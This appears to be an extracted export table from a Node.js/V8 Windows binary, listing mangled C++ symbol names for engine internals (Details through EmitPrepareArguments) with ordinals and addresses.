                                                                                                                                                                                                                                    ?DetailsAt@OrderedNameDictionaryHandler@internal@v8@@SA?AVPropertyDetails@23@VHeapObject@23@VInternalIndex@23@@Z52690x1408f9d80
                                                                                                                                                                                                                                    ?DetailsAt@SwissNameDictionary@internal@v8@@AEAA?AVPropertyDetails@23@H@Z52700x14053ed30
                                                                                                                                                                                                                                    ?DetailsAt@SwissNameDictionary@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z52710x14053ed50
                                                                                                                                                                                                                                    ?DetailsAtPut@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z52720x14053ed70
                                                                                                                                                                                                                                    ?DetailsAtPut@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z52730x14053ee00
                                                                                                                                                                                                                                    ?DetailsAtPut@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z52740x14090c820
                                                                                                                                                                                                                                    ?DetailsAtPut@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z52750x14090c850
                                                                                                                                                                                                                                    ?DetailsAtPut@OrderedNameDictionary@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z52760x14053ee30
                                                                                                                                                                                                                                    ?DetailsAtPut@OrderedNameDictionaryHandler@internal@v8@@SAXVHeapObject@23@VInternalIndex@23@VPropertyDetails@23@@Z52770x1408f9de0
                                                                                                                                                                                                                                    ?DetailsAtPut@SwissNameDictionary@internal@v8@@AEAAXHVPropertyDetails@23@@Z52780x14053ee70
                                                                                                                                                                                                                                    ?DetailsAtPut@SwissNameDictionary@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z52790x14053ee90
                                                                                                                                                                                                                                    ?DetectableCallable@Type@compiler@internal@v8@@SA?AV1234@XZ52800x14057eb70
                                                                                                                                                                                                                                    ?DetectableObject@Type@compiler@internal@v8@@SA?AV1234@XZ52810x14057eb80
                                                                                                                                                                                                                                    ?DetectableReceiver@Type@compiler@internal@v8@@SA?AV1234@XZ52820x14057eb90
                                                                                                                                                                                                                                    ?DetectableReceiverOrNull@Type@compiler@internal@v8@@SA?AV1234@XZ52830x14057eba0
                                                                                                                                                                                                                                    ?DetermineParticipation@ControlEquivalence@compiler@internal@v8@@AEAAXPEAVNode@234@@Z52840x141253e20
                                                                                                                                                                                                                                    ?DetermineParticipationEnqueue@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneQueue@PEAVNode@compiler@internal@v8@@@34@PEAVNode@234@@Z52850x141254120
                                                                                                                                                                                                                                    ?DetermineStubCallMode@CodeGenerator@compiler@internal@v8@@AEBA?AW4StubCallMode@34@XZ52860x14106d480
                                                                                                                                                                                                                                    ?DidAllocateDoubleRegisters@Frame@compiler@internal@v8@@QEBA_NXZ52870x14057ebb0
                                                                                                                                                                                                                                    ?DidFinishModuleAsyncEvaluation@Isolate@internal@v8@@QEAAXI@Z52880x14053eeb0
                                                                                                                                                                                                                                    ?DijkstraMarkingBarrier@WriteBarrier@internal@cppgc@@SAXAEBUParams@123@PEBX@Z52890x14053eed0
                                                                                                                                                                                                                                    ?DijkstraMarkingBarrierRange@WriteBarrier@internal@cppgc@@SAXAEBUParams@123@PEBX_K2P6AXPEAVVisitor@3@1@Z@Z52900x14053eee0
                                                                                                                                                                                                                                    ?DijkstraMarkingBarrierRangeSlow@WriteBarrier@internal@cppgc@@CAXAEAVHeapHandle@3@PEBX_K2P6AXPEAVVisitor@3@1@Z@Z52910x140503b90
                                                                                                                                                                                                                                    ?DijkstraMarkingBarrierSlow@WriteBarrier@internal@cppgc@@CAXPEBX@Z52920x140503c20
                                                                                                                                                                                                                                    ?DijkstraMarkingBarrierSlowWithSentinelCheck@WriteBarrier@internal@cppgc@@CAXPEBX@Z52930x140503cd0
                                                                                                                                                                                                                                    ?DirectorySeparator@OS@base@v8@@SADXZ52940x140ff3af0
                                                                                                                                                                                                                                    ?Disable@CodeEventHandler@v8@@QEAAXXZ52950x140c80fc0
                                                                                                                                                                                                                                    ?DisableCompilationForSourcelessUse@V8@v8@@SAXXZ52960x140c80fd0
                                                                                                                                                                                                                                    ?DisableEmbeddedBlobRefcounting@internal@v8@@YAXXZ52970x140b68700
                                                                                                                                                                                                                                    ?DisableForTesting@HeapGrowing@internal@cppgc@@QEAAXXZ52980x14051aab0
                                                                                                                                                                                                                                    ?DisableHeapGrowingForTesting@Heap@internal@cppgc@@QEAAXXZ52990x1405179e0
                                                                                                                                                                                                                                    ?DisableInlineAllocation@Heap@internal@v8@@QEAAXXZ53000x140b03140
                                                                                                                                                                                                                                    ?DisableInterrupts@StackGuard@internal@v8@@AEAAXXZ53010x140b584b0
                                                                                                                                                                                                                                    ?DisableIteration@IdentityMapBase@internal@v8@@IEAAXXZ53020x1407bb790
                                                                                                                                                                                                                                    ?DisableLogging@CpuProfiler@internal@v8@@AEAAXXZ53030x14087b570
                                                                                                                                                                                                                                    ?DisableMarkingBarrier@GlobalHandles@internal@v8@@SAXPEAVIsolate@23@@Z53040x140b4cc60
                                                                                                                                                                                                                                    ?DisableMemorySavingsMode@Isolate@internal@v8@@QEAAXXZ53050x14053eef0
                                                                                                                                                                                                                                    ?DisableMemorySavingsMode@Isolate@v8@@QEAAXXZ53060x14053eef0
                                                                                                                                                                                                                                    ?DisableScriptAndEval@CompilationCache@internal@v8@@QEAAXXZ53070x140c0b730
                                                                                                                                                                                                                                    ?DisableSignalStackDump@debug@base@v8@@YAXXZ53080x140ffeb20
                                                                                                                                                                                                                                    ?Disassemble@BytecodeArray@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z53090x1409f8c00
                                                                                                                                                                                                                                    ?Disassemble@Code@internal@v8@@QEAAXPEBDAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@PEAVIsolate@23@_K@Z53100x1409f9c00
                                                                                                                                                                                                                                    ?Disassemble@Disassembler@disasm@@SAXPEAU_iobuf@@PEAE1W4UnimplementedOpcodeAction@12@@Z53110x140577540
                                                                                                                                                                                                                                    ?Disassemble@WasmCode@wasm@internal@v8@@QEBAXPEBDAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@_K@Z53120x140660890
                                                                                                                                                                                                                                    ?DiscardAllBaselineCode@Debug@internal@v8@@QEAAXXZ53130x140bb90d0
                                                                                                                                                                                                                                    ?DiscardBaselineCode@Debug@internal@v8@@QEAAXVSharedFunctionInfo@23@@Z53140x140bb9350
                                                                                                                                                                                                                                    ?DiscardCompiled@SharedFunctionInfo@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z53150x1408ec4e0
                                                                                                                                                                                                                                    ?DiscardPerThreadDataForThisThread@Isolate@internal@v8@@QEAAXXZ53160x140b68780
                                                                                                                                                                                                                                    ?DiscardReservedEntry@ConstantArrayBuilder@interpreter@internal@v8@@QEAAXW4OperandSize@234@@Z53170x140a35170
                                                                                                                                                                                                                                    ?DiscardSystemPages@AddressSpaceReservation@base@v8@@QEAA_NPEAX_K@Z53180x140ff3b00
                                                                                                                                                                                                                                    ?DiscardSystemPages@BoundedPageAllocator@base@v8@@UEAA_NPEAX_K@Z53190x140ffb970
                                                                                                                                                                                                                                    ?DiscardSystemPages@OS@base@v8@@CA_NPEAX_K@Z53200x140ff3b10
                                                                                                                                                                                                                                    ?DiscardSystemPages@PageAllocator@base@v8@@UEAA_NPEAX_K@Z53210x140ff3b00
                                                                                                                                                                                                                                    ?DiscardSystemPages@VirtualAddressSpace@base@v8@@UEAA_N_K0@Z53220x140ff3b00
                                                                                                                                                                                                                                    ?DiscardSystemPages@VirtualAddressSubspace@base@v8@@UEAA_N_K0@Z53230x140ffc4b0
                                                                                                                                                                                                                                    ?DiscardThreadSpecificMetadata@Isolate@v8@@QEAAXXZ53240x140c80ff0
                                                                                                                                                                                                                                    ?Discover@WebSnapshotSerializer@internal@v8@@AEAAXV?$Handle@VHeapObject@internal@v8@@@23@@Z53250x1407b3550
                                                                                                                                                                                                                                    ?DiscoverArray@WebSnapshotSerializer@internal@v8@@AEAAXV?$Handle@VJSArray@internal@v8@@@23@@Z53260x1407b38d0
                                                                                                                                                                                                                                    ?DiscoverClass@WebSnapshotSerializer@internal@v8@@AEAAXV?$Handle@VJSFunction@internal@v8@@@23@@Z53270x1407b3af0
                                                                                                                                                                                                                                    ?DiscoverContext@WebSnapshotSerializer@internal@v8@@AEAAXV?$Handle@VContext@internal@v8@@@23@@Z53280x1407b3ba0
                                                                                                                                                                                                                                    ?DiscoverContextAndPrototype@WebSnapshotSerializer@internal@v8@@AEAAXV?$Handle@VJSFunction@internal@v8@@@23@@Z53290x1407b3f00
                                                                                                                                                                                                                                    ?DiscoverFunction@WebSnapshotSerializer@internal@v8@@AEAAXV?$Handle@VJSFunction@internal@v8@@@23@@Z53300x1407b4150
                                                                                                                                                                                                                                    ?DiscoverMap@WebSnapshotSerializer@internal@v8@@AEAAXV?$Handle@VMap@internal@v8@@@23@@Z53310x1407b4200
                                                                                                                                                                                                                                    ?DiscoverObject@WebSnapshotSerializer@internal@v8@@AEAAXV?$Handle@VJSObject@internal@v8@@@23@@Z53320x1407b4400
                                                                                                                                                                                                                                    ?DiscoverSource@WebSnapshotSerializer@internal@v8@@AEAAXV?$Handle@VJSFunction@internal@v8@@@23@@Z53330x1407b4a90
                                                                                                                                                                                                                                    ?DiscoverString@WebSnapshotSerializer@internal@v8@@AEAAXV?$Handle@VString@internal@v8@@@23@W4AllowInPlace@123@@Z53340x1407b4d20
                                                                                                                                                                                                                                    ?DispatchCodeEvent@ProfilerListener@internal@v8@@AEAAXAEBVCodeEventsContainer@23@@Z53350x14085d370
                                                                                                                                                                                                                                    ?Dispose@CpuProfiler@v8@@QEAAXXZ53360x140c81000
                                                                                                                                                                                                                                    ?Dispose@ExternalStringResourceBase@String@v8@@MEAAXXZ53370x140097540
                                                                                                                                                                                                                                    ?Dispose@Isolate@v8@@QEAAXXZ53380x140c81030
                                                                                                                                                                                                                                    ?Dispose@V8@v8@@SA_NXZ53390x140c810b0
                                                                                                                                                                                                                                    ?DisposeGlobal@api_internal@v8@@YAXPEA_K@Z53400x140c810c0
                                                                                                                                                                                                                                    ?DisposeOncePerProcess@Isolate@internal@v8@@SAXXZ53410x140b689a0
                                                                                                                                                                                                                                    ?DisposePlatform@V8@v8@@SAXXZ53420x140c810d0
                                                                                                                                                                                                                                    ?DisposeTracedReference@internal@v8@@YAXPEA_K@Z53430x140c810e0
                                                                                                                                                                                                                                    ?DisposeTurbofanCompilationJob@Compiler@internal@v8@@SAXPEAVTurbofanCompilationJob@23@_N@Z53440x140c04050
                                                                                                                                                                                                                                    ?Divide@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z53450x1410c4380
                                                                                                                                                                                                                                    ?DivideModuloIntBignum@Bignum@base@v8@@QEAAGAEBV123@@Z53460x141004640
                                                                                                                                                                                                                                    ?DoBackgroundWork@LazyCompileDispatcher@internal@v8@@AEAAXPEAVJobDelegate@3@@Z53470x140bd8f50
                                                                                                                                                                                                                                    ?DoIdleWork@LazyCompileDispatcher@internal@v8@@AEAAXN@Z53480x140bd9430
                                                                                                                                                                                                                                    ?DoIntegerToUint8Clamped@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z53490x1411f4bb0
                                                                                                                                                                                                                                    ?DoIntegral32ToBit@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z53500x1411f4d90
                                                                                                                                                                                                                                    ?DoJSToNumberOrNumericTruncatesToFloat64@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@PEAVRepresentationSelector@234@@Z53510x1411f4ed0
                                                                                                                                                                                                                                    ?DoJSToNumberOrNumericTruncatesToWord32@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@PEAVRepresentationSelector@234@@Z53520x1411f5680
                                                                                                                                                                                                                                    ?DoLdar@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAAXVRegister@234@@Z53530x140a37e40
                                                                                                                                                                                                                                    ?DoMax@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@PEBVOperator@234@W4MachineRepresentation@34@@Z53540x1411f5e00
                                                                                                                                                                                                                                    ?DoMin@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@PEBVOperator@234@W4MachineRepresentation@34@@Z53550x1411f5f50
                                                                                                                                                                                                                                    ?DoMov@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAAXVRegister@234@0@Z53560x140a37e60
                                                                                                                                                                                                                                    ?DoNumberToBit@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z53570x1411f6020
                                                                                                                                                                                                                                    ?DoNumberToUint8Clamped@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z53580x1411f6160
                                                                                                                                                                                                                                    ?DoOrderedNumberToBit@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z53590x1411f6370
                                                                                                                                                                                                                                    ?DoParseDeserializedFunction@Parser@internal@v8@@AEAAPEAVFunctionLiteral@23@PEAVIsolate@23@V?$MaybeHandle@VScopeInfo@internal@v8@@@23@PEAVParseInfo@23@HHHPEBVAstRawString@23@@Z53600x1408bd410
                                                                                                                                                                                                                                    ?DoParseFunction@Parser@internal@v8@@AEAAPEAVFunctionLiteral@23@PEAVIsolate@23@PEAVParseInfo@23@HHHPEBVAstRawString@23@@Z53610x1408bd470
                                                                                                                                                                                                                                    ?DoParseMemberExpressionContinuation@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAPEAVExpression@23@PEAV423@@Z53620x14088e7a0
                                                                                                                                                                                                                                    ?DoParseProgram@Parser@internal@v8@@AEAAPEAVFunctionLiteral@23@PEAVIsolate@23@PEAVParseInfo@23@@Z53630x1408bde50
                                                                                                                                                                                                                                    ?DoPromiseChecks@JSCallReducer@compiler@internal@v8@@AEAA_NPEAVMapInference@234@@Z53640x141162160
                                                                                                                                                                                                                                    ?DoSample@Sampler@sampler@v8@@QEAAXXZ53650x140a1fb20
                                                                                                                                                                                                                                    ?DoSigned32ToUint8Clamped@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z53660x1411f64c0
                                                                                                                                                                                                                                    ?DoStar@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAAXVRegister@234@@Z53670x140a37e90
                                                                                                                                                                                                                                    ?DoUnsigned32ToUint8Clamped@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z53680x1411f66a0
                                                                                                                                                                                                                                    ?Done@BreakIterator@internal@v8@@QEBA_NXZ53690x14053ef00
                                                                                                                                                                                                                                    ?Done@EhFrameIterator@internal@v8@@QEBA_NXZ53700x1400d01e0
                                                                                                                                                                                                                                    ?DotPrintForTesting@RegExp@internal@v8@@SAXPEBDPEAVRegExpNode@23@@Z53710x14082a260
                                                                                                                                                                                                                                    ?Double@AsmType@wasm@internal@v8@@SAPEAV1234@XZ53720x14072f8f0
                                                                                                                                                                                                                                    ?DoubleQ@AsmType@wasm@internal@v8@@SAPEAV1234@XZ53730x14072f900
                                                                                                                                                                                                                                    ?DoubleToAscii@base@v8@@YAXNW4DtoaMode@12@HV?$Vector@D@12@PEAH22@Z53740x140ffdb00
                                                                                                                                                                                                                                    ?DoubleToCString@internal@v8@@YAPEBDNV?$Vector@D@base@2@@Z53750x140a0c150
                                                                                                                                                                                                                                    ?DoubleValue@Scanner@internal@v8@@QEAANXZ53760x14087ed30
                                                                                                                                                                                                                                    ?Drop@MacroAssembler@internal@v8@@QEAAXH@Z53770x1405f7040
                                                                                                                                                                                                                                    ?Drop@RegExpMacroAssemblerX64@internal@v8@@AEAAXXZ53780x1405705b0
                                                                                                                                                                                                                                    ?DropArguments@TurboAssembler@internal@v8@@IEAAXVRegister@23@W4ArgumentsCountType@123@W4ArgumentsCountMode@123@@Z53790x1405f7080
                                                                                                                                                                                                                                    ?DropArguments@TurboAssembler@internal@v8@@QEAAXVRegister@23@0W4ArgumentsCountType@123@W4ArgumentsCountMode@123@@Z53800x1405f71e0
                                                                                                                                                                                                                                    ?DropArgumentsAndPushNewReceiver@TurboAssembler@internal@v8@@QEAAXVRegister@23@00W4ArgumentsCountType@123@W4ArgumentsCountMode@123@@Z53810x1405f7240
                                                                                                                                                                                                                                    ?DropArgumentsAndPushNewReceiver@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@0W4ArgumentsCountType@123@W4ArgumentsCountMode@123@@Z53820x1405f72b0
                                                                                                                                                                                                                                    ?DropOldData@StringTable@internal@v8@@QEAAXXZ53830x1408e3f10
                                                                                                                                                                                                                                    ?DropUnderReturnAddress@MacroAssembler@internal@v8@@QEAAXHVRegister@23@@Z53840x1405f7330
                                                                                                                                                                                                                                    ?DumpAndResetStats@Isolate@internal@v8@@QEAAXXZ53850x140b69150
                                                                                                                                                                                                                                    ?DumpAndResetStats@Isolate@v8@@QEAAXXZ53860x140c811f0
                                                                                                                                                                                                                                    ?DumpAndResetTurboStatistics@WasmEngine@wasm@internal@v8@@QEAAXXZ53870x14064c590
                                                                                                                                                                                                                                    ?DumpAsyncTaskStacksStateForTest@v8_inspector@@YAXPEAVV8Inspector@1@@Z53880x14079e0e0
                                                                                                                                                                                                                                    ?DumpTurboStatistics@WasmEngine@wasm@internal@v8@@QEAAXXZ53890x14064c6e0
                                                                                                                                                                                                                                    ?DuplicateConditionIfNeeded@BranchConditionDuplicator@compiler@internal@v8@@QEAAXPEAVNode@234@@Z53900x141116680
                                                                                                                                                                                                                                    ?DuplicateNode@BranchConditionDuplicator@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z53910x1411167e0
                                                                                                                                                                                                                                    ?DynamicGrowingFactor@?$MemoryController@UGlobalMemoryTrait@internal@v8@@@internal@v8@@CANNNN@Z53920x140b16d30
                                                                                                                                                                                                                                    ?DynamicGrowingFactor@?$MemoryController@UV8HeapTrait@internal@v8@@@internal@v8@@CANNNN@Z53930x140b16d30
                                                                                                                                                                                                                                    ?EffectInputCount@Operator@compiler@internal@v8@@QEBAHXZ53940x140444fb0
                                                                                                                                                                                                                                    ?EffectOutputCount@Operator@compiler@internal@v8@@QEBAHXZ53950x140299940
                                                                                                                                                                                                                                    ?EffectPhi@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z53960x14103a050
                                                                                                                                                                                                                                    ?ElapsedTime@CompilationJob@internal@v8@@IEBA?AVTimeDelta@base@3@XZ53970x1406bc570
                                                                                                                                                                                                                                    ?ElementAccessOf@compiler@internal@v8@@YAAEBUElementAccess@123@PEBVOperator@123@@Z53980x1403a2160
                                                                                                                                                                                                                                    ?ElementAdded@HashTableBase@internal@v8@@QEAAXXZ53990x14053ef10
                                                                                                                                                                                                                                    ?ElementRemoved@HashTableBase@internal@v8@@QEAAXXZ54000x14053ef30
                                                                                                                                                                                                                                    ?ElementSizeInBytes@AsmType@wasm@internal@v8@@QEAAHXZ54010x14072f910
                                                                                                                                                                                                                                    ?ElementSizeInBytes@internal@v8@@YAHW4MachineRepresentation@12@@Z54020x14053ef70
                                                                                                                                                                                                                                    ?ElementSizeInPointers@internal@v8@@YAHW4MachineRepresentation@12@@Z54030x14053ef90
                                                                                                                                                                                                                                    ?ElementSizeLog2Of@internal@v8@@YAHW4MachineRepresentation@12@@Z54040x14053efc0
                                                                                                                                                                                                                                    ?ElementsKindToByteSize@internal@v8@@YAHW4ElementsKind@12@@Z54050x1409f2840
                                                                                                                                                                                                                                    ?ElementsKindToShiftSize@internal@v8@@YAHW4ElementsKind@12@@Z54060x1409f2860
                                                                                                                                                                                                                                    ?ElementsRemoved@HashTableBase@internal@v8@@QEAAXH@Z54070x14053f060
                                                                                                                                                                                                                                    ?Eliminate@MoveOperands@compiler@internal@v8@@QEAAXXZ54080x14057ebf0
                                                                                                                                                                                                                                    ?EliminateLoopExit@LoopPeeler@compiler@internal@v8@@SAXPEAVNode@234@@Z54090x1411c2990
                                                                                                                                                                                                                                    ?EliminateLoopExits@LoopPeeler@compiler@internal@v8@@SAXPEAVGraph@234@PEAVZone@34@@Z54100x1411c2b90
                                                                                                                                                                                                                                    ?EliminateRedundantPhiNodes@Schedule@compiler@internal@v8@@AEAAXXZ54110x141068570
                                                                                                                                                                                                                                    ?Else@ConditionalControlFlowBuilder@interpreter@internal@v8@@QEAAXXZ54120x140a33af0
                                                                                                                                                                                                                                    ?EmbedderAllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANN@Z54130x140b1a4d0
                                                                                                                                                                                                                                    ?EmbedderSizeOfObjects@Heap@internal@v8@@QEBA_KXZ54140x140b03b00
                                                                                                                                                                                                                                    ?EmbedderSpeedInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ54150x140b1a570
                                                                                                                                                                                                                                    ?EmbedderStep@IncrementalMarking@internal@v8@@QEAA?AW4StepResult@23@NPEAN@Z54160x140af5d40
                                                                                                                                                                                                                                    ?EmbedderWriteBarrier@LocalEmbedderHeapTracer@internal@v8@@QEAAXPEAVHeap@23@VJSObject@23@@Z54170x140b3a900
                                                                                                                                                                                                                                    ?Emit16@RegExpBytecodeGenerator@internal@v8@@AEAAXI@Z54180x140854dd0
                                                                                                                                                                                                                                    ?Emit32@RegExpBytecodeGenerator@internal@v8@@AEAAXI@Z54190x140854e20
                                                                                                                                                                                                                                    ?Emit8@RegExpBytecodeGenerator@internal@v8@@AEAAXI@Z54200x140854e70
                                                                                                                                                                                                                                    ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@000000_KPEAV6234@@Z54210x14105c9d0
                                                                                                                                                                                                                                    ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@00000_KPEAV6234@@Z54220x14105cb20
                                                                                                                                                                                                                                    ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@0000_KPEAV6234@@Z54230x14105cc60
                                                                                                                                                                                                                                    ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@000_KPEAV6234@@Z54240x14105cd90
                                                                                                                                                                                                                                    ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@00_KPEAV6234@@Z54250x14105ceb0
                                                                                                                                                                                                                                    ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@0_KPEAV6234@@Z54260x14105cfc0
                                                                                                                                                                                                                                    ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@_KPEAV6234@@Z54270x14105d0c0
                                                                                                                                                                                                                                    ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@I_KPEAVInstructionOperand@234@0101@Z54280x14105d1b0
                                                                                                                                                                                                                                    ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@PEAV5234@@Z54290x14105d240
                                                                                                                                                                                                                                    ?Emit@LocalDeclEncoder@wasm@internal@v8@@QEBA_KPEAE@Z54300x14069a520
                                                                                                                                                                                                                                    ?Emit@RegExpBytecodeGenerator@internal@v8@@AEAAXIH@Z54310x140854eb0
                                                                                                                                                                                                                                    ?Emit@RegExpBytecodeGenerator@internal@v8@@AEAAXII@Z54320x140854eb0
                                                                                                                                                                                                                                    ?Emit@SafepointTableBuilder@internal@v8@@QEAAXPEAVAssembler@23@H@Z54330x140bdc330
                                                                                                                                                                                                                                    ?Emit@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@@Z54340x140634760
                                                                                                                                                                                                                                    ?EmitAsyncDestroy@node@@YAXPEAVEnvironment@1@Uasync_context@1@@Z54350x14029b610
                                                                                                                                                                                                                                    ?EmitAsyncDestroy@node@@YAXPEAVIsolate@v8@@Uasync_context@1@@Z54360x14029b620
                                                                                                                                                                                                                                    ?EmitAsyncInit@node@@YA?AUasync_context@1@PEAVIsolate@v8@@V?$Local@VObject@v8@@@4@PEBDN@Z54370x14029b640
                                                                                                                                                                                                                                    ?EmitAsyncInit@node@@YA?AUasync_context@1@PEAVIsolate@v8@@V?$Local@VObject@v8@@@4@V?$Local@VString@v8@@@4@N@Z54380x14029b790
                                                                                                                                                                                                                                    ?EmitBeforeExit@node@@YAXPEAVEnvironment@1@@Z54390x14029b840
                                                                                                                                                                                                                                    ?EmitBinarySearchSwitch@InstructionSelector@compiler@internal@v8@@AEAAXAEBVSwitchInfo@234@AEBVInstructionOperand@234@@Z54400x14105d270
                                                                                                                                                                                                                                    ?EmitByte@WasmFunctionBuilder@wasm@internal@v8@@QEAAXE@Z54410x1406347a0
                                                                                                                                                                                                                                    ?EmitBytecode@BytecodeArrayWriter@interpreter@internal@v8@@AEAAXQEBVBytecodeNode@234@@Z54420x140a52190
                                                                                                                                                                                                                                    ?EmitCode@WasmFunctionBuilder@wasm@internal@v8@@QEAAXPEBEI@Z54430x1406347e0
                                                                                                                                                                                                                                    ?EmitDecrementCounter@MacroAssembler@internal@v8@@QEAAXPEAVStatsCounter@23@H@Z54440x1405f73f0
                                                                                                                                                                                                                                    ?EmitDirectCallIndex@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z54450x140634830
                                                                                                                                                                                                                                    ?EmitExit@node@@YAHPEAVEnvironment@1@@Z54460x14029b860
                                                                                                                                                                                                                                    ?EmitF32Const@WasmFunctionBuilder@wasm@internal@v8@@QEAAXM@Z54470x1406348b0
                                                                                                                                                                                                                                    ?EmitF64Const@WasmFunctionBuilder@wasm@internal@v8@@QEAAXN@Z54480x140634910
                                                                                                                                                                                                                                    ?EmitFarJumpSlot@JumpTableAssembler@wasm@internal@v8@@AEAAX_K@Z54490x14069aa70
                                                                                                                                                                                                                                    ?EmitFunctionStartSourcePosition@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAXH@Z54500x140a5dcd0
                                                                                                                                                                                                                                    ?EmitGetLocal@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z54510x140634970
                                                                                                                                                                                                                                    ?EmitI32Const@WasmFunctionBuilder@wasm@internal@v8@@QEAAXH@Z54520x140634980
                                                                                                                                                                                                                                    ?EmitI32V@WasmFunctionBuilder@wasm@internal@v8@@QEAAXH@Z54530x1406349c0
                                                                                                                                                                                                                                    ?EmitI64Const@WasmFunctionBuilder@wasm@internal@v8@@QEAAX_J@Z54540x1406349d0
                                                                                                                                                                                                                                    ?EmitIdentity@InstructionSelector@compiler@internal@v8@@QEAAXPEAVNode@234@@Z54550x14105d4a0
                                                                                                                                                                                                                                    ?EmitIncrementCounter@MacroAssembler@internal@v8@@QEAAXPEAVStatsCounter@23@H@Z54560x1405f74d0
                                                                                                                                                                                                                                    ?EmitJump@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXPEAVBytecodeLabels@234@@Z54570x140a33b30
                                                                                                                                                                                                                                    ?EmitJump@BytecodeArrayWriter@interpreter@internal@v8@@AEAAXPEAVBytecodeNode@234@PEAVBytecodeLabel@234@@Z54580x140a522f0
                                                                                                                                                                                                                                    ?EmitJumpIfFalse@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXW4ToBooleanMode@BytecodeArrayBuilder@234@PEAVBytecodeLabels@234@@Z54590x140a33b60
                                                                                                                                                                                                                                    ?EmitJumpIfNull@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXPEAVBytecodeLabels@234@@Z54600x140a33b90
                                                                                                                                                                                                                                    ?EmitJumpIfTrue@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXW4ToBooleanMode@BytecodeArrayBuilder@234@PEAVBytecodeLabels@234@@Z54610x140a33bc0
                                                                                                                                                                                                                                    ?EmitJumpIfUndefined@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXPEAVBytecodeLabels@234@@Z54620x140a33bf0
                                                                                                                                                                                                                                    ?EmitJumpLoop@BytecodeArrayWriter@interpreter@internal@v8@@AEAAXPEAVBytecodeNode@234@PEAVBytecodeLoopHeader@234@@Z54630x140a52370
                                                                                                                                                                                                                                    ?EmitJumpSlot@JumpTableAssembler@wasm@internal@v8@@AEAA_N_K@Z54640x14069ab10
                                                                                                                                                                                                                                    ?EmitJumpTableIfExists@SwitchBuilder@interpreter@internal@v8@@QEAAXHHAEAV?$map@HPEAVCaseClause@internal@v8@@U?$less@H@std@@V?$allocator@U?$pair@$$CBHPEAVCaseClause@internal@v8@@@std@@@5@@std@@@Z54650x140a33c20
                                                                                                                                                                                                                                    ?EmitLazyCompileJumpSlot@JumpTableAssembler@wasm@internal@v8@@AEAAXI_K@Z54660x14069ab50
                                                                                                                                                                                                                                    ?EmitOrLink@RegExpBytecodeGenerator@internal@v8@@AEAAXPEAVLabel@23@@Z54670x140854f10
                                                                                                                                                                                                                                    ?EmitPrepareArguments@InstructionSelector@compiler@internal@v8@@AEAAXPEAV?$ZoneVector@UPushParameter@compiler@internal@v8@@@34@PEBVCallDescriptor@234@PEAVNode@234@@Z54680x140584f70
